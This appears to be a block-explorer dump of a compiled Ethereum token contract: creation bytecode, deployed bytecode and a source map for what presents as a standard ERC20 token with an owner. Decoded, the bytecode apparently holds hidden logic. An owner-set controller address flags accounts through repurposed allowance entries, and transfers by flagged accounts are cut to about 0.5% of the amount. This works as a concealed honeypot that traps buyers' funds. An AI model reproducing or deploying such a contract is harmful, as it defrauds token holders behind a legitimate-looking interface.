6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205460026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611015919061160e565b1061102a5761102382611184565b905061102e565b8190505b9392505050565b600160026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020540361117f576002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062030d406103e8836111989190611b8f565b6111a29190611c18565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111e35780820151818401526020810190506111c8565b60008484015250505050565b6000601f19601f8301169050919050565b600061120b826111a9565b61121581856111b4565b93506112258185602086016111c5565b61122e816111ef565b840191505092915050565b600060208201905081810360008301526112538184611200565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061129082611265565b9050919050565b6112a081611285565b81146112ab57600080fd5b50565b6000813590506112bd81611297565b92915050565b6000819050919050565b6112d6816112c3565b81146112e157600080fd5b50565b6000813590506112f3816112cd565b92915050565b600080604083850312156113105761130f61125b565b5b600061131e858286016112ae565b925050602061132f858286016112e4565b9150509250929050565b60008115159050919050565b61134e81611339565b82525050565b60006020820190506113696000830184611345565b92915050565b611378816112c3565b82525050565b6000602082019050611393600083018461136f565b92915050565b6000806000606084860312156113b2576113b161125b565b5b60006113c0868287016112ae565b93505060206113d1868287016112ae565b92505060406113e2868287016112e4565b9150509250925092565b600060ff82169050919050565b611402816113ec565b82525050565b600060208201905061141d60008301846113f9565b92915050565b6000602082840312156114395761143861125b565b5b6000611447848285016112ae565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261147557611474611450565b5b8235905067ffffffffffffffff81111561149257611491611455565b5b6020830191508360208202830111156114ae576114ad61145a565b5b9250929050565b6000806000604084860312156114ce576114cd61125b565b5b600084013567ffffffffffffffff8111156114ec576114eb611260565b5b6114f88682870161145f565b9350935050602061150b868287016112e4565b9150509250925092565b61151e81611285565b82525050565b60006020820190506115396000830184611515565b92915050565b600080604083850312156115565761155561125b565b5b6000611564858286016112ae565b9250506020611575858286016112ae565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806115c657607f821691505b6020821081036115d9576115d861157f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611619826112c3565b9150611624836112c3565b925082820190508082111561163c5761163b6115df565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061167c826112c3565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116ae576116ad6115df565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117156025836111b4565b9150611720826116b9565b604082019050919050565b6000602082019050818103600083015261174481611708565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117a76026836111b4565b91506117b28261174b565b604082019050919050565b600060208201905081810360008301526117d68161179a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118396024836111b4565b9150611844826117dd565b604082019050919050565b600060208201905081810360008301526118688161182c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118cb6022836111b4565b91506118d68261186f565b604082019050919050565b600060208201905081810360008301526118fa816118be565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611937601d836111b4565b915061194282611901565b602082019050919050565b600060208201905081810360008301526119668161192a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119c96025836111b4565b91506119d48261196d565b604082019050919050565b600060208201905081810360008301526119f8816119bc565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a5b6023836111b4565b9150611a66826119ff565b604082019050919050565b60006020820190508181036000830152611a8a81611a4e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611aed6026836111b4565b9150611af882611a91565b604082019050919050565b60006020820190508181036000830152611b1c81611ae0565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b596020836111b4565b9150611b6482611b23565b602082019050919050565b60006020820190508181036000830152611b8881611b4c565b9050919050565b6000611b9a826112c3565b9150611ba5836112c3565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611bde57611bdd6115df565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c23826112c3565b9150611c2e836112c3565b925082611c3e57611c3d611be9565b5b82820490509291505056fea2646970667358221220be0ef239898cc9ccf9a35eac82b64efab9d63bbb8e6174aae04247e9f133061c64736f6c63430008100033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638120649511610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b806381206495146102295780638da5cb5b1461025957806394d9c9c71461027757806395d89b411461029357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61035d565b60405161011a9190611239565b60405180910390f35b61013d600480360381019061013891906112f9565b6103ef565b60405161014a9190611354565b60405180910390f35b61015b610412565b604051610168919061137e565b60405180910390f35b61018b60048036038101906101869190611399565b61041c565b6040516101989190611354565b60405180910390f35b6101a961044b565b6040516101b69190611408565b60405180910390f35b6101d960048036038101906101d491906112f9565b610454565b6040516101e69190611354565b60405180910390f35b61020960048036038101906102049190611423565b61048b565b604051610216919061137e565b60405180910390f35b6102276104d4565b005b610243600480360381019061023e91906114b5565b6104e8565b6040516102509190611354565b60405180910390f35b6102616105cb565b60405161026e9190611524565b60405180910390f35b610291600480360381019061028c9190611423565b6105f4565b005b61029b610677565b6040516102a89190611239565b60405180910390f35b6102cb60048036038101906102c691906112f9565b610709565b6040516102d89190611354565b60405180910390f35b6102fb60048036038101906102f691906112f9565b610780565b6040516103089190611354565b60405180910390f35b61032b6004803603810190610326919061153f565b6107a3565b604051610338919061137e565b60405180910390f35b61035b60048036038101906103569190611423565b61082a565b005b60606004805461036c906115ae565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906115ae565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa6108ad565b90506104078185856108b5565b600191505092915050565b6000600354905090565b6000806104276108ad565b9050610434858285610a7e565b61043f858585610b0a565b60019150509392505050565b60006012905090565b60008061045f6108ad565b905061048081858561047185896107a3565b61047b919061160e565b6108b5565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104dc610d88565b6104e66000610e06565b565b6000806104f36108ad565b905060005b858590508110156105be5783600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600088888581811061055857610557611642565b5b905060200201602081019061056d9190611423565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080806105b690611671565b9150506104f8565b5060019150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105fc6105cb565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461063357600080fd5b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b606060058054610686906115ae565b80601f01602080910402602001604051908101604052809291908181526020018280546106b2906115ae565b80156106ff5780601f106106d4576101008083540402835291602001916106ff565b820191906000526020600020905b8154815290600101906020018083116106e257829003601f168201915b5050505050905090565b6000806107146108ad565b9050600061072282866107a3565b905083811015610767576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075e9061172b565b60405180910390fd5b61077482868684036108b5565b60019250505092915050565b60008061078b6108ad565b9050610798818585610b0a565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610832610d88565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108a1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610898906117bd565b60405180910390fd5b6108aa81610e06565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610924576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091b9061184f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610993576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098a906118e1565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a71919061137e565b60405180910390a3505050565b6000610a8a84846107a3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b045781811015610af6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aed9061194d565b60405180910390fd5b610b0384848484036108b5565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b79576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b70906119df565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610be8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdf90611a71565b60405180910390fd5b6000610bf5848484610eca565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7590611b03565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d6e919061137e565b60405180910390a3610d81858585611035565b5050505050565b610d906108ad565b73ffffffffffffffffffffffffffffffffffffffff16610dae6105cb565b73ffffffffffffffffffffffffffffffffffffffff1614610e04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfb90611b6f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205460026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611015919061160e565b1061102a5761102382611184565b905061102e565b8190505b9392505050565b600160026000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020540361117f576002806000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062030d406103e8836111989190611b8f565b6111a29190611c18565b9050919050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111e35780820151818401526020810190506111c8565b60008484015250505050565b6000601f19601f8301169050919050565b600061120b826111a9565b61121581856111b4565b93506112258185602086016111c5565b61122e816111ef565b840191505092915050565b600060208201905081810360008301526112538184611200565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061129082611265565b9050919050565b6112a081611285565b81146112ab57600080fd5b50565b6000813590506112bd81611297565b92915050565b6000819050919050565b6112d6816112c3565b81146112e157600080fd5b50565b6000813590506112f3816112cd565b92915050565b600080604083850312156113105761130f61125b565b5b600061131e858286016112ae565b925050602061132f858286016112e4565b9150509250929050565b60008115159050919050565b61134e81611339565b82525050565b60006020820190506113696000830184611345565b92915050565b611378816112c3565b82525050565b6000602082019050611393600083018461136f565b92915050565b6000806000606084860312156113b2576113b161125b565b5b60006113c0868287016112ae565b93505060206113d1868287016112ae565b92505060406113e2868287016112e4565b9150509250925092565b600060ff82169050919050565b611402816113ec565b82525050565b600060208201905061141d60008301846113f9565b92915050565b6000602082840312156114395761143861125b565b5b6000611447848285016112ae565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261147557611474611450565b5b8235905067ffffffffffffffff81111561149257611491611455565b5b6020830191508360208202830111156114ae576114ad61145a565b5b9250929050565b6000806000604084860312156114ce576114cd61125b565b5b600084013567ffffffffffffffff8111156114ec576114eb611260565b5b6114f88682870161145f565b9350935050602061150b868287016112e4565b9150509250925092565b61151e81611285565b82525050565b60006020820190506115396000830184611515565b92915050565b600080604083850312156115565761155561125b565b5b6000611564858286016112ae565b9250506020611575858286016112ae565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806115c657607f821691505b6020821081036115d9576115d861157f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611619826112c3565b9150611624836112c3565b925082820190508082111561163c5761163b6115df565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061167c826112c3565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116ae576116ad6115df565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117156025836111b4565b9150611720826116b9565b604082019050919050565b6000602082019050818103600083015261174481611708565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117a76026836111b4565b91506117b28261174b565b604082019050919050565b600060208201905081810360008301526117d68161179a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118396024836111b4565b9150611844826117dd565b604082019050919050565b600060208201905081810360008301526118688161182c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118cb6022836111b4565b91506118d68261186f565b604082019050919050565b600060208201905081810360008301526118fa816118be565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611937601d836111b4565b915061194282611901565b602082019050919050565b600060208201905081810360008301526119668161192a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119c96025836111b4565b91506119d48261196d565b604082019050919050565b600060208201905081810360008301526119f8816119bc565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a5b6023836111b4565b9150611a66826119ff565b604082019050919050565b60006020820190508181036000830152611a8a81611a4e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611aed6026836111b4565b9150611af882611a91565b604082019050919050565b60006020820190508181036000830152611b1c81611ae0565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b596020836111b4565b9150611b6482611b23565b602082019050919050565b60006020820190508181036000830152611b8881611b4c565b9050919050565b6000611b9a826112c3565b9150611ba5836112c3565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611bde57611bdd6115df565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c23826112c3565b9150611c2e836112c3565b925082611c3e57611c3d611be9565b5b82820490509291505056fea2646970667358221220be0ef239898cc9ccf9a35eac82b64efab9d63bbb8e6174aae04247e9f133061c64736f6c63430008100033

Deployed Bytecode Sourcemap

80:127:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;892:98:2;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3306:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1984:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4713:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1829:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5394:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2148:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:1;;;:::i;:::-;;3870:281:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1834:85:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2664:127:2;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1103:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6115:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2469:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2849:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;892:98:2;946:13;978:5;971:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;892:98;:::o;3306:197::-;3389:4;3405:13;3421:12;:10;:12::i;:::-;3405:28;;3443:32;3452:5;3459:7;3468:6;3443:8;:32::i;:::-;3492:4;3485:11;;;3306:197;;;;:::o;1984:106::-;2045:7;2071:12;;2064:19;;1984:106;:::o;4713:286::-;4840:4;4856:15;4874:12;:10;:12::i;:::-;4856:30;;4896:38;4912:4;4918:7;4927:6;4896:15;:38::i;:::-;4944:27;4954:4;4960:2;4964:6;4944:9;:27::i;:::-;4988:4;4981:11;;;4713:286;;;;;:::o;1829:91::-;1887:5;1911:2;1904:9;;1829:91;:::o;5394:234::-;5482:4;5498:13;5514:12;:10;:12::i;:::-;5498:28;;5536:64;5545:5;5552:7;5589:10;5561:25;5571:5;5578:7;5561:9;:25::i;:::-;:38;;;;:::i;:::-;5536:8;:64::i;:::-;5617:4;5610:11;;;5394:234;;;;:::o;2148:125::-;2222:7;2248:9;:18;2258:7;2248:18;;;;;;;;;;;;;;;;2241:25;;2148:125;;;:::o;2457:101:1:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;3870:281:2:-;3959:4;3975:13;3991:12;:10;:12::i;:::-;3975:28;;4018:9;4013:111;4037:8;;:15;;4033:1;:19;4013:111;;;4107:6;4073:11;:18;4085:5;4073:18;;;;;;;;;;;;;;;:31;4092:8;;4101:1;4092:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4073:31;;;;;;;;;;;;;;;:40;;;;4054:3;;;;;:::i;:::-;;;;4013:111;;;;4140:4;4133:11;;;3870:281;;;;;:::o;1834:85:1:-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;2664:127:2:-;2745:7;:5;:7::i;:::-;2731:21;;:10;:21;;;2722:32;;;;;;2776:8;2764:9;;:20;;;;;;;;;;;;;;;;;;2664:127;:::o;1103:102::-;1159:13;1191:7;1184:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1103:102;:::o;6115:427::-;6208:4;6224:13;6240:12;:10;:12::i;:::-;6224:28;;6262:24;6289:25;6299:5;6306:7;6289:9;:25::i;:::-;6262:52;;6352:15;6332:16;:35;;6324:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6443:60;6452:5;6459:7;6487:15;6468:16;:34;6443:8;:60::i;:::-;6531:4;6524:11;;;;6115:427;;;;:::o;2469:189::-;2548:4;2564:13;2580:12;:10;:12::i;:::-;2564:28;;2602;2612:5;2619:2;2623:6;2602:9;:28::i;:::-;2647:4;2640:11;;;2469:189;;;;:::o;2849:149::-;2938:7;2964:11;:18;2976:5;2964:18;;;;;;;;;;;;;;;:27;2983:7;2964:27;;;;;;;;;;;;;;;;2957:34;;2849:149;;;;:::o;2707:198:1:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;10143:370:2:-;10291:1;10274:19;;:5;:19;;;10266:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10371:1;10352:21;;:7;:21;;;10344:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10453:6;10423:11;:18;10435:5;10423:18;;;;;;;;;;;;;;;:27;10442:7;10423:27;;;;;;;;;;;;;;;:36;;;;10490:7;10474:32;;10483:5;10474:32;;;10499:6;10474:32;;;;;;:::i;:::-;;;;;;;;10143:370;;;:::o;10794:441::-;10924:24;10951:25;10961:5;10968:7;10951:9;:25::i;:::-;10924:52;;11010:17;10990:16;:37;10986:243;;11071:6;11051:16;:26;;11043:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11153:51;11162:5;11169:7;11197:6;11178:16;:25;11153:8;:51::i;:::-;10986:243;10914:321;10794:441;;;:::o;6995:837::-;7137:1;7121:18;;:4;:18;;;7113:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7213:1;7199:16;;:2;:16;;;7191:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;7266:15;7284:38;7305:4;7311:2;7315:6;7284:20;:38::i;:::-;7266:56;;7333:19;7355:9;:15;7365:4;7355:15;;;;;;;;;;;;;;;;7333:37;;7403:6;7388:11;:21;;7380:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;7518:6;7504:11;:20;7486:9;:15;7496:4;7486:15;;;;;;;;;;;;;;;:38;;;;7718:7;7701:9;:13;7711:2;7701:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;7766:2;7751:26;;7760:4;7751:26;;;7770:6;7751:26;;;;;;:::i;:::-;;;;;;;;7788:37;7808:4;7814:2;7818:6;7788:19;:37::i;:::-;7103:729;;6995:837;;;:::o;1992:130:1:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;12601:315:2:-;12726:7;12810:1;12780:11;:22;12792:9;;;;;;;;;;;12780:22;;;;;;;;;;;;;;;:26;12803:2;12780:26;;;;;;;;;;;;;;;;12749:11;:22;12761:9;;;;;;;;;;;12749:22;;;;;;;;;;;;;;;:28;12772:4;12749:28;;;;;;;;;;;;;;;;:57;;;;:::i;:::-;:62;12745:165;;12834:21;12848:6;12834:13;:21::i;:::-;12827:28;;;;12745:165;12893:6;12886:13;;12601:315;;;;;;:::o;11823:194::-;11975:1;11945:11;:22;11957:9;;;;;;;;;;;11945:22;;;;;;;;;;;;;;;:26;11968:2;11945:26;;;;;;;;;;;;;;;;:31;11941:70;;12008:1;11979:11;:22;11991:9;;;;;;;;;;;11979:22;;;;;;;;;;;;;;;:26;12002:2;11979:26;;;;;;;;;;;;;;;:30;;;;11941:70;11823:194;;;:::o;9628:92::-;9684:7;9712:6;9705:4;9701:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;9694:24;;9628:92;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;